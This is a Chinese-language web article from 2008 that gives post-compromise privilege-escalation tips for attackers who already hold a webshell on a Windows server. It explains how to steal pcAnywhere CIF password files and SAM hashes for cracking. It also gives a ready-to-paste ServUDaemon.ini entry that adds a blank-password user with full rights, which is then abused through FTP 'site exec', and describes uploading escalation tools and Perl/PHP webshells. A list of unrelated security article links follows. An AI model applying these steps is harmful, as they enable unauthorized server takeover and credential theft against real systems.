許多高手提升權(quán)限技巧

互聯(lián)網(wǎng) 發(fā)布時間：2008-10-08 21:28:24 作者：佚名

當(dāng)我們?nèi)〉靡粋€webshell時候，下一部要做的就是提升權(quán)限　　個人總結(jié)如下：　　1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳轉(zhuǎn)到這個目錄，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密碼，登陸

當(dāng)我們?nèi)〉靡粋€webshell時候，下一部要做的就是提升權(quán)限

　　個人總結(jié)如下：

　　1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳轉(zhuǎn)到這個目錄，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密碼，登陸

　　2.C:\WINNT\system32\config進(jìn)這里下它的SAM，破解用戶的密碼

　　c:\winnt\repaire 下是備份

　　用到破解sam密碼的軟件有LC，SAMinside

　　3.C:\Documents and Settings\All Users\「開始」菜單\程序看這里能跳轉(zhuǎn)不，我們從這里可以獲取好多有用的信息

　　可以看見好多快捷方式，我們一般選擇Serv-U的，然后本地查看屬性，知道路徑后，看能否跳轉(zhuǎn)

　　進(jìn)去后，如果有權(quán)限修改ServUDaemon.ini，加個用戶上去，密碼為空

　　[USER=dede|1]

　　Password=

　　HomeDir=c:TimeOut=600

　　Maintenance=System

　　Access1=C:\|RWAMELCDP

　　Access1=d:\|RWAMELCDP

　　Access1=f:\|RWAMELCDP

　　SKEYValues=

　　這個用戶具有最高權(quán)限，然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限

　　4.c:\winnt\system32\inetsrv\data就是這個目錄，同樣是erveryone 完全控制，我們所要做的就是把提升權(quán)限的工具上傳上去，然后執(zhí)行

　　5.看能否跳轉(zhuǎn)到如下目錄

　　c:\php, 用phpspy

　　c:\prel，有時候不一定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell

　　#!/usr/bin/perl

　　binmode(STDOUT);

　　syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

相關(guān)文章

封UDP的服務(wù)器真的打不了么？封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時候會出現(xiàn)一些封UDP的字眼，網(wǎng)上一些文章也說UDP協(xié)議不可靠！為什么要封UDP呢？既然不可靠，為什么有些人還要使用它呢？今天與你們分享一下UDP，希望
2024-05-07
魔獸世界服務(wù)器被DDoS攻擊怎么辦？DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來說也是比較常見的，同行競爭激烈，在官服開放時也遇到過DDOS攻擊，要是飛飛沒記錯是在22年9月14日，從剛開始的身份驗證服務(wù)器出現(xiàn)問題，到確
2023-07-17
分享五大免費企業(yè)網(wǎng)絡(luò)入侵檢測（IDS）工具
這篇文章主要分享一下五大免費企業(yè)網(wǎng)絡(luò)入侵檢測（IDS）工具，當(dāng)前企業(yè)對于網(wǎng)絡(luò)安全越來越重視，那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測
2019-12-01
網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢？網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計算機或設(shè)備之間進(jìn)行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系，需要的朋友不妨閱讀本文了解一下
2019-04-02
DDoS攻擊原理是什么?DDoS攻擊原理及防護(hù)措施介紹
DDoS攻擊是由DoS攻擊轉(zhuǎn)化的，這項攻擊的原理以及表現(xiàn)形式是怎樣的呢？要如何的進(jìn)行防御呢？本文中將會有詳細(xì)的介紹，需要的朋友不妨閱讀本文進(jìn)行參考
2019-01-15
基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備，感興趣的朋友不妨閱讀本文進(jìn)行了解
2019-01-11
為何黑客要挾制路由器DNS 用戶該怎樣實時發(fā)覺和防備方法
起首說說挾制路由器是什么意思，路由器挾制平日指的是，開啟了無線網(wǎng)絡(luò)功效的無線路由器，攻擊者經(jīng)由過程破解無線暗碼銜接上無線網(wǎng)后，再登錄路由治理界面來節(jié)制全部無線網(wǎng)
2018-05-16
大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解，，小編覺得還是挺不錯的，具有一定借鑒價值，下面就來和小編一起看看
2018-01-25
詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密，如何保護(hù)sd卡文件的安全，如何給SD卡設(shè)置密碼、如何給SD卡加密，下面就跟小編一起來看看吧
2018-01-19
server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細(xì)介紹，保護(hù)服務(wù)器共享文件設(shè)置訪問權(quán)限，讓每個部門只訪問自己的共享文件等，
2018-01-19